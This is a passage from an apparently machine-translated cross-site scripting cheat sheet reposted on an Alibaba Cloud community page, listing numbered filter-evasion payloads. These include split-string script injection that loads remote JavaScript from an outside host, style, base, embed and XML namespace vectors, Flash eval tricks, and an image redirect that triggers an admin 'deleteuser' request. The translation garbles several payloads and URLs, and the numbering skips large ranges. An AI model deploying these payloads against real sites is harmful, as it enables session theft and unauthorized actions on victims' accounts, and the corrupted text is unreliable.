(9) unicode encoding of 7-bit UTF-8 is not semicolon (calculator)
(10) There is no semicolon (calculator) in hexadecimal encoding)
(11) embedded tags that separate Javascript
(12) embedded encoding labels that separate Javascript
(13) embedded line breaks
(14) embedded carriage return
(15) embedded multi-line javascript injection, an extreme XSS example
(16) solve the restricted characters (the same page is required)
<SCRIPT> Z = 'document. '</SCRIPT>
<SCRIPT> Z = z + 'write (''</SCRIPT>
<SCRIPT> Z = z + '<SCRIPT' </SCRIPT>
<SCRIPT> Z = z + 'src = HT '</SCRIPT>
<SCRIPT> Z = z + 'tp: // WW '</SCRIPT>
<SCRIPT> Z = z + 'W. shell' </SCRIPT>
<SCRIPT> Z = z + '. NET/1.' </SCRIPT>
<SCRIPT> Z = z + 'js> </SC '</SCRIPT>
<SCRIPT> Z = z + 'ript> ") '</SCRIPT>
<SCRIPT> eval_r (z) </SCRIPT>
(17) null characters
Perl-e 'print " out
(18) null character 2, null character is basically ineffective in China, because there is no place to use
Perl-e 'print '<Scr \ 0ip> alert (\ "XSS \") </Scr \ 0ept> ";'> out
(53) style Background
<Style> <style type = "text/CSS"> body {Background: URL ("javascript: Alert ('xsss')")} </style>
(54) Base
<Base href = "javascript: Alert ('xss'); //">
(55) embed tag, which can be embedded into flash, contains XSS
<Embed src = "http://3366org/xss/xss.swf”> </embed>
(56) Use actionscrpt in flash to mix your XSS code
A = "get ";
B = "URL (\"";
C = "javascript :";
D = "alert ('xss ');\")";
Eval_r (A + B + C + D );
(57) The XML namespace. HTC file must be on the same server as your XSS carrier.
<HTML xmlns: XSS>
<? Import namespace = "XSS" implementation = "http://3366org/xss/xss.htc”>
<XSS: XSS> XSS </XSS: XSS>
</Html>
(58) If your JS is filtered out, you can add JS Code to the image to use it.
<SCRIPT src = ""> </SCRIPT>
(59) IMG embedded command, which can execute any command
(601_imginsert command (a.jpg on the same server)
Redirect 302/a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Escape symbol Filtering
<Script a = ">" src = "http://3#org/xss.js"> </SCRIPT>
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.